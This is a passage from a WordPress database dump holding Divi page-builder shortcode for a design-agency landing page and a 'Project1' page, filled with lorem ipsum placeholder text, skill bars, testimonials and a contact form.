button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','LANDING PAGE','','inherit','closed','closed','','226-revision-v1','','','2020-07-06 17:26:28','2020-07-06 17:26:28','',226,'https://52.66.212.87/2020/07/06/226-revision-v1/',0,'revision','',0),(230,1,'2020-07-06 19:06:29','2020-07-06 19:06:29','[et_pb_section admin_label=\"section\"]\n			[et_pb_row admin_label=\"row\"]\n				[et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<!-- wp:paragraph -->\n<p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>\n<!-- /wp:paragraph -->[/et_pb_text][/et_pb_column]\n			[/et_pb_row]\n		[/et_pb_section]','Hello world!','','inherit','closed','closed','','1-revision-v1','','','2020-07-06 19:06:29','2020-07-06 19:06:29','',1,'https://52.66.212.87/2020/07/06/1-revision-v1/',0,'revision','',0),(236,1,'2020-07-06 20:27:42','2020-07-06 20:27:42','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(0,0,0,0.6)\" background_color_gradient_end=\"rgba(0,0,0,0.6)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/business_01.jpg\" custom_padding=\"110px|0px|110px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|500||on|||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_letter_spacing=\"3px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" locked=\"off\"]<p>Product Design</p>\r[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#ffffff\" header_font_size=\"60px\" header_line_height=\"1.3em\" header_2_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>My Project</h1>\r[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#ffffff\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" locked=\"off\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fullwidth Image\" _builder_version=\"3.22\" custom_padding=\"110px|0px|110px|0px\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-03-1.png\" show_in_lightbox=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"2%\"][/et_pb_image][et_pb_text _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"fade\" animation_direction=\"top\"]<p><span>Donec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. Integer interdum interdum purus non lobortis. Ut felis velit, sollicitudin.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Text and Image\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px|0px|110px|0px\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#747d88\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" header_3_font=\"Montserrat||||||||\" header_3_line_height=\"1.5em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"120px|||\" animation_style=\"fade\" animation_direction=\"top\"]<h3>Lorem Ipsum Dolor</h3>\n<p><span>Donec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. Integer interdum interdum purus non lobortis. Ut felis velit, sollicitudin a libero ultricies, gravida scelerisque elit. Integer euismod vitae magna bibendum feugiat. </span></p>\n<p><span>Sed tempor magna quis feugiat elementum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Image and Text\" _builder_version=\"3.22\" background_color=\"#ffffff\" custom_padding=\"110px|0px|110px|0px\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-02.jpg\" show_in_lightbox=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#747d88\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" header_3_font=\"Montserrat||||||||\" header_3_line_height=\"1.5em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"60px|||\" animation_style=\"fade\" animation_direction=\"top\"]<h3>Lorem Ipsum Dolor</h3>\r\n<p><span>Donec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. Integer interdum interdum purus non lobortis.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Project1','','publish','closed','closed','','project1','','','2020-07-06 20:27:48','2020-07-06 20:27:48','',0,'https://52.66.212.87/?page_id=236',0,'page','',0),(237,1,'2020-07-06 20:10:17','2020-07-06 20:10:17','<!-- wp:divi/placeholder /-->','Project1','','inherit','closed','closed','','236-revision-v1','','','2020-07-06 20:10:17','2020-07-06 20:10:17','',236,'https://52.66.212.87/2020/07/06/236-revision-v1/',0,'revision','',0),(242,1,'2020-07-06 20:27:42','2020-07-06 20:27:42','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(0,0,0,0.6)\" background_color_gradient_end=\"rgba(0,0,0,0.6)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/business_01.jpg\" custom_padding=\"110px|0px|110px|0px|false|false\" 